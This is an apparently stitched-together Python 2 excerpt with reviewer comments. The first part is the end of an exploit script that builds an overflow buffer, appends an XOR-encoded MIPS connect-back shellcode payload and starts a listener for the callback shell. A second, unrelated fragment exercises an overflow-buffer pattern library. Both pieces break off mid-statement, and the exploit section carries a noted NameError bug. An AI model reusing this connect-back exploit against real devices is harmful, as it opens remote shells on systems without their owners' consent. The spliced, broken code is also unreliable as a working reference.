#connectback_server=ConnectbackServer(connectback_host,startcmd="/usr/sbin/telnetd -p 31337",connectback_shell=False)
# NOTE(review): this excerpt starts mid-script. connectback_host, badchars, buf,
# LittleEndian, sys, time and the live connectback_server (the line above is only
# a commented-out alternative construction) must all be defined above this point.
payload=CallbackPayload(connectback_host,LittleEndian)
encoded_payload=MipsXorEncoder(payload,LittleEndian,badchars=badchars)
# Pad the buffer out to 700 bytes before appending the encoded payload
# (presumably add_pattern appends that many pattern bytes; confirm against
# the OverflowBuffer API).
buf.add_pattern(700-buf.len())
buf.add_string(encoded_payload.shellcode, description="encoded connect back payload")

# Offset-lookup mode: with exactly one argument, report where that string
# lands in the buffer and exit without starting the listener.
if len(sys.argv) == 2:
    search_value=sys.argv[1]
    offset=buf.find_offset(search_value)
    if(offset < 0):
        # BUG(review): search_string is never assigned here (the value is bound
        # to search_value) -- both print statements raise NameError unless
        # search_string is defined earlier in the script.
        print "Couldn't find string %s in the overflow buffer." % search_string
    else:
        print "Found string %s at\noffset: %d" % (search_string,offset)
    exit(0)

# The pid=None initialisation is immediately overwritten; it is redundant.
pid=None
pid=connectback_server.serve_connectback()
# Assumed to give the forked server a moment to start listening -- TODO confirm.
time.sleep(1)
if pid and pid > 0:
    # NOTE(review): the rest of this try block (and its except clause) is
    # beyond this excerpt. int(sys.argv[2]) raises ValueError on a non-numeric
    # port and IndexError when fewer than three arguments are given.
    try:
        addr=sys.argv[1]
        port=int(sys.argv[2])
# Exercise the EmptyOverflowBuffer API: build a pattern-filled buffer, print its
# layout, look up an offset, then check how a buffer with bad characters
# configured reacts to sections that would contain them.
from crossbow.overflow_development.overflowbuilder import EmptyOverflowBuffer
from crossbow.common.support import BigEndian
from crossbow.common.support import Logging

logger=Logging()

logger.LOG_INFO("Creating empty overflow buffer")
# 'A', 'B' and '6' are declared as bad characters for this buffer.
buf=EmptyOverflowBuffer(BigEndian,badchars=['A','B','6'])
buf.add_pattern(1024)
logger.LOG_INFO("Length of empty overflow buffer: %d" % buf.len())
buf.print_section_descriptions()
print buf.pretty_string()
# NOTE(review): "u3Au4" contains 'A', which is in badchars -- whether the
# generated pattern can contain it (and so whether find_offset can succeed)
# depends on how the library handles bad characters; confirm the expected
# result. The log message literal has a typo ("Offet"); it is emitted text and
# is left untouched here.
logger.LOG_INFO("Offet of \"u3Au4\": %d" % buf.find_offset("u3Au4"))

# Second buffer: same bad characters, smaller pattern. The log literal also
# carries a typo ("emtpy"); left unchanged as it is runtime output.
logger.LOG_INFO("Creating second emtpy overflow buffer")
buf2=EmptyOverflowBuffer(BigEndian,badchars=['A','B','6'])
# Catching Exception here is broad, but this is a demonstration harness that
# only logs the failure rather than swallowing it silently.
try:
    buf2.add_pattern(128)
except Exception as e:
    logger.LOG_WARN("Failed to add section.")
    logger.LOG_WARN(str(e))

# 'A' is in badchars, so this add_string call is presumably expected to raise;
# the except clause for this try is beyond this excerpt.
try:
    buf2.add_string('A'*128)